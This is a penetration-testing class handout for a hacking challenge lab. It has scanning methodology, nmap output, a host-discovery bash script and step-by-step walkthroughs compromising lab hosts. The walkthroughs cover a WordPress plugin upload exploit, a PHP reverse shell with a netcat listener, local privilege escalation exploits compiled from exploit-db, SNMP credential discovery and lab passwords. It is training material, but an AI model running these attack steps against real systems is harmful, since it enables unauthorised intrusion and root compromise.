The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.

Issue 1. Lack of a thorough attack process

==========================================

	- Host discovery	

	- Service discovery

	- Service version discovery

	- Vulnerability research

	- Linux (port 111)/Window (port 445) Enumeration

	- Webserver vulnerability scan

	- Directory brute force every webserver

	- Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)

	- Brute force all services

Issue 2. Lack of automation of the process

==========================================

	- Research attacks scripts on the internet to enhance your methodology

Issue 3. Failing to document all steps being performed and their output

=======================================================================

Issue 4. Lack of sleep during the exam

======================================

Issue 5. Failing to reboot target machines prior to attack

==========================================================

--------------------------------------------------------------------------------------------------------------

A good strategy to use to prepare would be:

Step 1. Ensure that you are comfortable with Linux

--------------------------------------------------

- LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)

- Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, simple shell scripting, and well beyond a Linux user skill level)

You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):

https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB

https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK

https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E

2. You should be comfortable with the following tools:

------------------------------------------------------

Nmap:

https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo

Metasploit:

https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja

Burp Suite:

https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

Sqlmap:

https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75

Nikto:

https://www.youtube.com/watch?v=GH9qn_DBzCk

Enum4Linux:

https://www.youtube.com/watch?v=hA5raaGOQKQ

RPCINFO/SHOWMOUNT:

https://www.youtube.com/watch?v=FlRAA-1UXWQ

Hydra:

https://www.youtube.com/watch?v=rLtj8tEmGso

3. You need to comfortable with basic exploit development

---------------------------------------------------------

Basic assembly:

https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB

Basic exploit development (first 5 videos in the playlist):

https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl

4. You need to be comfortable with privilege escalation

-------------------------------------------------------

Linux

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Windows

https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/

http://www.fuzzysecurity.com/tutorials/16.html

                            #################################

----------- ############### # Day 1: Advanced Scanning Labs # ############### -----------

                            #################################

########################

# Scanning Methodology #

########################

- Ping Sweep

What's alive?

------------

---------------------------Type This-----------------------------------

sudo nmap -sP 157.166.226.*

-----------------------------------------------------------------------

    -if -SP yields no results try:

---------------------------Type This-----------------------------------

sudo nmap -sL 157.166.226.*

-----------------------------------------------------------------------

    -Look for hostnames:

---------------------------Type This-----------------------------------

sudo nmap -sL 157.166.226.* | grep com

-----------------------------------------------------------------------

- Port Scan

What's where?

------------

---------------------------Type This-----------------------------------

sudo nmap -sS 162.243.126.247

-----------------------------------------------------------------------

- Bannergrab/Version Query

What versions of software are running

-------------------------------------

---------------------------Type This-----------------------------------

sudo nmap -sV 162.243.126.247

-----------------------------------------------------------------------

- Vulnerability Research

Lookup the banner versions for public exploits

----------------------------------------------

http://exploit-db.com

http://securityfocus.com/bid

https://packetstormsecurity.com/files/tags/exploit/

-----------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------

Some tools to install:

---------------------------Type This-----------------------------------

wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

gcc propecia.c -o propecia

sudo cp propecia /bin

-----------------------------------------------------------------------

- I prefer to use Putty to SSH into my Linux host.

- You can download Putty from here:

- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into putty

ip address:	149.28.201.171

username:	labpentest

password:	lab!network@attack!

##############################

# Scanning Process to follow #

##############################

Step 1: Host Discovery

----------------------

---------------------------Type This-----------------------------------

nmap -sP 172.31.2.0/24

nmap -sL 172.31.2.0/24

nmap -sS --open -p 22,445 172.31.2.0/24

propecia 172.31.2 22 > file1

propecia 172.31.2 445 > file2

cat file1 file2 > file3

cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt

cat lab.txt

-----------------------------------------------------------------------

Step 2: Port Scan

-----------------

nmap -sS <IP-ADDRESS>

nmap -sU -p 69,161 <IP-ADDRESS>

---------------------------Type This-----------------------------------

sudo nmap -sS 172.31.2.0/24

sudo nmap -sU -p 69,161 172.31.2.0/24

-----------------------------------------------------------------------

Step 3: Bannergrab

------------------

nmap -sV <IP-ADDRESS>

    |

    ----> Vulnerability Research

---------------------------Type This-----------------------------------

sudo nmap -sV 172.31.2.0/24

-----------------------------------------------------------------------

Step 4: Enumerate common Windows/Linux file sharing services

Step 3 is where most people STOP, and you need to move on and look deeper

------------------------------------------------------------

---------------------------Type This-----------------------------------

sudo apt install smbclient libnss-winbind winbind ldapscript

wget https://raw.githubusercontent.com/Wh1t3Fox/polenum/master/polenum.py

chmod +x polenum.py

sudo cp polenum.py /bin/

git clone https://github.com/portcullislabs/enum4linux.git

cd enum4linux/

perl enum4linux.pl -U 172.31.2.11

nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.86

---------------------------------------------------------------------------------------

Step 5: Vulnerability Scan the webservers

-----------------------------------------

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h <IP-ADDRESS>

Step 6: Directory Bruteforce every webserver

--------------------------------------------

sudo apt install -y libcurl4-openssl-dev

git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

./dirb

./dirb http://<IP-ADDRESS> wordlists/big.txt

Step 7: Analyze source code of all webpages found

-------------------------------------------------

lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links

If you ever need to download an entire Web site, perhaps for off-line viewing, wget can do the job—for example:

$ wget \

     --recursive \

     --no-clobber \

     --page-requisites \

     --html-extension \

     --convert-links \

     --restrict-file-names=windows \

     --domains website.org \

     --no-parent \

         www.website.org/tutorials/html/

This command downloads the Web site www.website.org/tutorials/html/.

The options are:

--recursive: download the entire Web site.

--domains website.org: don't follow links outside website.org.

--no-parent: don't follow links outside the directory tutorials/html/.

--page-requisites: get all the elements that compose the page (images, CSS and so on).

--html-extension: save files with the .html extension.

--convert-links: convert links so that they work locally, off-line.

--restrict-file-names=windows: modify filenames so that they will work in Windows as well.

--no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).

Step 8: Bruteforce any services you find

----------------------------------------

sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-devcd ~/toolz

git clone https://github.com/vanhauser-thc/thc-hydra.git

cd thc-hydra

./configure

make

hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS

hydra -l user -P passlist.txt ftp://<IP-ADDRESS

##################

# Host Discovery #

##################

Reason:

-------

You have to discover the reachable hosts in the network before you can attack them.

Hosts discovery syntax:

-----------------------

	nmap -sP 172.31.2.0/24

	propecia 172.31.2 22 > file1

	propecia 172.31.2 445 > file2

	cat file1 file2 > file3

	cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt

	cat lab.txt

Issues:

-------

Issue we had to deal with was hosts that didn't respond to ICMP

	Hosts discovered:

	-----------------

	172.31.2.11

	172.31.2.14

	172.31.2.47

	172.31.2.64

	172.31.2.86

	172.31.2.117

	172.31.2.157

	172.31.2.217

	172.31.2.238

#####################

# Service Discovery #

#####################

Reason:

-------

Identifying what services are running on what hosts allows for you to map the network topology.

Port Scan syntax:

	sudo nmap -sS -Pn -iL lab.txt

	sudo nmap -sU -p69,161 -Pn -iL lab.txt

Services discovered:

--------------------

joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt

Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC

Nmap scan report for 172.31.2.11

Host is up (0.087s latency).

Not shown: 995 filtered ports

PORT     STATE SERVICE

21/tcp   open  ftp

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

3389/tcp open  ms-wbt-server

9999/tcp open  abyss

Nmap scan report for 172.31.2.11

Host is up.

PORT    STATE         SERVICE

69/udp  open|filtered tftp

161/udp open|filtered snmp

Nmap scan report for 172.31.2.14

Host is up (0.087s latency).

Not shown: 995 filtered ports

PORT     STATE SERVICE

21/tcp   open  ftp

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

3389/tcp open  ms-wbt-server

9999/tcp open  abyss

Nmap scan report for 172.31.2.14

Host is up.

PORT    STATE         SERVICE

69/udp  open|filtered tftp

161/udp open|filtered snmp

Nmap scan report for 172.31.2.47

Host is up (0.086s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE

22/tcp open  ssh

80/tcp open  http

Nmap scan report for 172.31.2.64

Host is up (0.087s latency).

Not shown: 997 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

6667/tcp open  irc

Nmap scan report for 172.31.2.86

Host is up (0.086s latency).

Not shown: 989 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

53/tcp   open  domain

80/tcp   open  http

110/tcp  open  pop3

111/tcp  open  rpcbind

139/tcp  open  netbios-ssn

143/tcp  open  imap

445/tcp  open  microsoft-ds

993/tcp  open  imaps

995/tcp  open  pop3s

8080/tcp open  http-proxy

Nmap scan report for 172.31.2.117

Host is up (0.087s latency).

Not shown: 997 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

2020/tcp open  xinupageserver

Nmap scan report for 172.31.2.157

Host is up (0.087s latency).

Not shown: 997 closed ports

PORT   STATE SERVICE

21/tcp open  ftp

22/tcp open  ssh

80/tcp open  http

Nmap scan report for 172.31.2.217

Host is up (0.087s latency).

Not shown: 997 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

3260/tcp open  iscsi

Nmap scan report for 172.31.2.238

Host is up (0.087s latency).

Not shown: 997 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

6969/tcp open  acmsoda

Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds

##############################################

# Service Version Discovery (Bannergrabbing) #

##############################################

Reason:

-------

Identifying what versions of services are running on what hosts allows for you to determine if the hosts are vulnerable to attack.

Port Scan syntax:

joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt

Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC

Nmap scan report for 172.31.2.11

Host is up (0.087s latency).

Not shown: 995 filtered ports

PORT     STATE SERVICE       VERSION

21/tcp   open  ftp           FreeFloat ftpd 1.00

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds

3389/tcp open  ms-wbt-server Microsoft Terminal Service

9999/tcp open  abyss?

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 172.31.2.14

Host is up (0.087s latency).

Not shown: 995 filtered ports

PORT     STATE SERVICE       VERSION

21/tcp   open  ftp           FreeFloat ftpd 1.00

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds

3389/tcp open  ms-wbt-server Microsoft Terminal Service

9999/tcp open  abyss?

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 172.31.2.47

Host is up (0.087s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.31.2.64

Host is up (0.087s latency).

Not shown: 997 closed ports

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))

6667/tcp open  irc     ngircd

Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.31.2.86

Host is up (0.087s latency).

Not shown: 989 closed ports

PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)

53/tcp   open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)

80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))

110/tcp  open  pop3        Dovecot pop3d

111/tcp  open  rpcbind     2-4 (RPC #100000)

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

143/tcp  open  imap        Dovecot imapd (Ubuntu)

445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)

995/tcp  open  ssl/pop3    Dovecot pop3d

8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:campmoca;:ubuntu_linux

Nmap scan report for 172.31.2.117

Host is up (0.086s latency).

Not shown: 997 closed ports

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))

2020/tcp open  ftp     vsftpd 2.0.8 or later

Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.31.2.157

Host is up (0.086s latency).

Not shown: 997 closed ports

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 2.0.8 or later

22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)

80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

Nmap scan report for 172.31.2.217

Host is up (0.087s latency).

Not shown: 997 closed ports

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http    nginx

3260/tcp open  iscsi?

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.31.2.238

Host is up (0.087s latency).

Not shown: 997 closed ports

PORT     STATE SERVICE  VERSION

22/tcp   open  ssh      OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)

80/tcp   open  http     nginx 1.6.2

6969/tcp open  acmsoda?

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds

-----------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------

#!/bin/bash

# Script made during the CyberWar class for the students to play with, debug, and improve.

# Take a look at the following websites for ideas:

# https://github.com/commonexploits/port-scan-automation

# https://www.commonexploits.com/penetration-testing-scripts/

# https://github.com/averagesecurityguy/scripts

# https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py

# Some thoughts of things to add to this script:

# Shodan queries (API key)

# AWS scanning (need credentials)

# Jenkins scanning

# Active Directory enumeration

# Github scanning (API key required)

# Blockchain platforms

#############################################

# Check to see if script is running as root #

#############################################

if [ "$EUID" -ne 0 ]

  then echo "Please run as root"

  exit

fi

####################################

# Check to see if gcc is installed #

####################################

file1="/usr/bin/gcc"

if [ -f "$file1" ]

then

	echo "$file is installed."

    clear

else

	echo "$file not found."

	echo Installing gcc

    apt-get install -y gcc

	clear

fi

########################

# Make the directories #

########################

cd /tmp

rm -rf customerAudit/

rm -rf NetworkAudit/

mkdir -p /tmp/NetworkAudit/discovered_services/

mkdir -p /tmp/NetworkAudit/scan/windows/

mkdir -p /tmp/NetworkAudit/scan/sunrpc/

mkdir -p /tmp/NetworkAudit/scan/ssh/

mkdir -p /tmp/NetworkAudit/scan/ftp/

mkdir -p /tmp/NetworkAudit/scan/http/

mkdir -p /tmp/NetworkAudit/scan/telnet/

mkdir -p /tmp/NetworkAudit/scan/pop3/

mkdir -p /tmp/NetworkAudit/scan/printers/

mkdir -p /tmp/NetworkAudit/scan/mssql_databases/

mkdir -p /tmp/NetworkAudit/scan/oracle_databases/

mkdir -p /tmp/NetworkAudit/scan/mysql_databases/

mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/

#####################

# Download propecia #

#####################

file2="/bin/propecia"

if [ -f "$file2" ]

then

	echo "$file is installed."

    clear

else

	echo "$file not found."

	echo Installing propecia

    cd /tmp

    wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

    gcc propecia.c -o propecia

    cp propecia /bin

fi

######################

# Find Windows Hosts #

######################

clear

echo "Scanning for windows hosts."

propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts

clear

echo "Done scanning for windows hosts. FTP is next."

##################

# Find FTP Hosts #

##################

echo "Scanning for hosts running FTP."

propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts

clear

echo "Done scanning for FTP hosts. SSH is next."

##################

# Find SSH Hosts #

##################

echo "Scanning for hosts running SSH."

propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts

clear

echo "Done scanning for SSH hosts. POP3 is next."

###################

# Find POP3 Hosts #

###################

echo "Scanning for hosts running POP3."

propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts

clear

echo "Done scanning for POP3 hosts. SunRPC is next."

#####################

# Find SunRPC Hosts #

#####################

echo "Scanning for hosts running SunRPC."

propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts

clear

echo "Done scanning for SunRPC hosts. Telnet is next."

#####################

# Find Telnet Hosts #

#####################

echo "Scanning for hosts running Telnet."

propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts

clear

echo "Done scanning for Telnet hosts. HTTP is next."

###################

# Find HTTP Hosts #

###################

echo "Scanning for hosts running HTTP"

propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts

clear

echo "Done scanning for HTTP hosts. HTTPS hosts are next."

###################

# Find HTTPS Hosts #

###################

echo "Scanning for hosts running HTTP"

propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts

clear

echo "Done scanning for HTTPS hosts. Databases are next."

##################

# Find Databases #

##################

echo "Scanning for hosts running MS SQL Server" 

propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts

clear

echo "Scanning for hosts running Oracle" 

propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts

clear

echo "Scanning for hosts running Postgres" 

propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts

clear

echo "Scanning for hosts running MongoDB" 

propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts

clear

echo "Scanning for hosts running MySQL" 

propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts

clear

echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."

###############################

# Ok, let's do the NMAP files #

###############################

clear

# Windows

for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done

echo "Done with Windows."

clear

# FTP

for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done

echo "Done with FTP."

clear

# SSH

for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done

echo "Done with SSH."

clear

# SUNRPC

for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done

echo "Done with SunRPC."

clear

# POP3

for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg  $x > /tmp/NetworkAudit/scan/pop3/$x ; done

echo "Done with POP3."

# clear

# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py

# as a good reference for what nmap nse scripts to run against port 80 and 443

# for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe  --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done

# echo "Done with HTTP."

# clear

# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py

# as a good reference for what nmap nse scripts to run against port 80 and 443

# for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe  --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done

# echo "Done with HTTP."

clear

# SQL Servers

for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done

echo "Done with MS SQL."

clear

# Oracle Servers

# FIX THIS: needs brute force wordlists for this to run correctly

# for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done

# echo "Done with Oracle."

clear

# MongoDB 

for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info  $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done

echo "Done with MongoDB."

clear

# MySQL Servers

for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done

echo "Done with MySQL."

# Add postgres nse scripts 

# References:

# https://nmap.org/nsedoc/lib/pgsql.html

# https://nmap.org/nsedoc/scripts/pgsql-brute.html

# 

echo " "

echo " "

sleep 1

clear

echo "Done, now check your results."

sleep 2

clear

cd /tmp/NetworkAudit/scan/

ls

----------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------

                            ######################################

----------- ############### # Day 2: Attacking Hosts in the lab  ################ -----------

                            ######################################

######################

# Attacking Minotaur #

######################

Step 1: Portscan/Bannergrab the target host

---------------------------Type This-----------------------------------

sudo nmap -sV 172.31.2.117

-----------------------------------------------------------------------

Step 2: Vulnerability scan the web server

---------------------------Type This-----------------------------------

nikto.pl -h 172.31.2.117

-----------------------------------------------------------------------

Step 3: Directory brute-force the webserver

---------------------------Type This-----------------------------------

dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt

-----------------------------------------------------------------------

### dirb output ###

==> DIRECTORY: http://172.31.2.117/bull/

-----------------------------------------------------------------------

Step 4: Run wordpress vulnerability scanner

---------------------------Type This-----------------------------------

wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt

cewl -w words.txt http://172.31.2.117/bull/

cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt

wc -l whateverbro.txt 

john --wordlist=whateverbro.txt --rules --stdout > words-john.txt

wc -l words-john.txt

wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10

-----------------------------------------------------------------------

Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)

---------------------------Type This-----------------------------------

msfconsole

use exploit/unix/webapp/wp_slideshowgallery_upload

set RHOST 172.31.2.117

set RPORT 80

set TARGETURI /bull

set WP_USER bully

set WP_PASSWORD Bighornedbulls

exploit

-----------------------------------------------------------------------

Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.

This is a lab limitation that I implemented to stop students from compromising hosts in the lab network

and then from the lab network attacking other students.

---------------------------Type This-----------------------------------

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

tar -zxvf php-reverse-shell-1.0.tar.gz

cd ~/toolz/php-reverse-shell-1.0/

nano php-reverse-shell.php

-----------------------------------------------------------------------

    ***** change the $ip and $port variables to a host that you have already compromised in the network

    ***** for this example I chose 172.31.2.64 and kept port 1234

---------------------------Type This-----------------------------------

chmod 777 php-reverse-shell.php

cp php-reverse-shell.php ..

-----------------------------------------------------------------------

Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.

Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py

--------------------------Type This-----------------------------------

python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php

-----------------------------------------------------------------------

Set up netcat listener on previously compromised host

---------------------------Type This-----------------------------------

ssh -l webmin 172.31.2.64

    webmin1980

nc -lvp 1234

-----------------------------------------------------------------------

---------------------Type This in your browser ------------------------

http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php

-----------------------------------------------------------------------

Now check your listener to see if you got the connection

---------------------------Type This-----------------------------------

id

/sbin/ifconfig

python -c 'import pty;pty.spawn("/bin/bash")'

---------------------------Type This-----------------------------------

cd /tmp

cat >> exploit2.c << out

-----------------------------------------------------------------------

**************paste in the content from here *****************

https://www.exploit-db.com/raw/37292/

**************hit enter a few times *****************

---------------------------Type This-----------------------------------

out

gcc -o boom2 exploit2.c

./boom2

id

-----------------------------------------------------------------------

---------------------------Type This-----------------------------------

sudo nmap -sV 172.31.2.181

-----------------------------------------------------------------------

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)

---------------------------Type This----------------------------------- 

sudo nmap -sU -p69,161 172.31.2.181

-----------------------------------------------------------------------

PORT    STATE  SERVICE

69/udp  closed tftp

161/udp open   snmp

---------------------------Type This----------------------------------- 

sudo apt-get -y install onesixtyone snmp

wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt

onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181

----------------------------------------------------------------------

Gives error "Community string too long". A little bit of google and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1

---------------------------Type This----------------------------------- 

cat wordlist-common-snmp-community-strings.txt | grep -v TENmanUFactOryPOWER > snmp-community-strings.txt

onesixtyone -c snmp-community-strings.txt 172.31.2.181

snmpwalk -Os -c public -v 1 172.31.2.181

---------------------------------------------------------------------

Username "eric" found in snmpwalk, and the string "There is a house in New Orleans they call it..."

Google the sentence, and I find out that the whole sentence is “There is a house in New Orleans they call it the rising sun”.

Try to SSH to the box using the credentials eric:therisingsun

---------------------------Type This-----------------------------------

ssh -l eric 172.31.2.181

     therisingsun

id

cat /etc/issue

uname -a

cat /etc/*release

---------------------------Type This-----------------------------------

cat >> exploit.c << out

**************paste in the content from here *****************

https://www.exploit-db.com/raw/39166/

------ hit enter a few times ------

------ then type 'out' ----- this closes the file handle...

---------------------------Type This-----------------------------------

gcc -o boom exploit.c

./boom

id

......YEAH - do the happy dance!!!!

How to go after 172.31.2.238

Reference: https://t0w3ntum.com/2017/01/07/baffle/

---------------------------------------------------------------

sudo nmap -sV -p 3260 172.31.2.217

sudo apt install open-iscsi

sudo iscsiadm -m discovery -t  st -p 172.31.2.217

sudo iscsiadm -m discovery -t  st -p 172.31.2.217:3260

sudo iscsiadm -m node -p 172.31.2.217 --login

sudo /bin/bash

fdisk -l

    ***** look for /dev/sda5 - Linux swap / Solaris *******

mkdir /mnt/217vm

mount /dev/sdb /mnt/217vm

cd /mnt/217vm

ls

cat flag1.txt

file bobsdisk.dsk

mkdir /media/bobsdisk

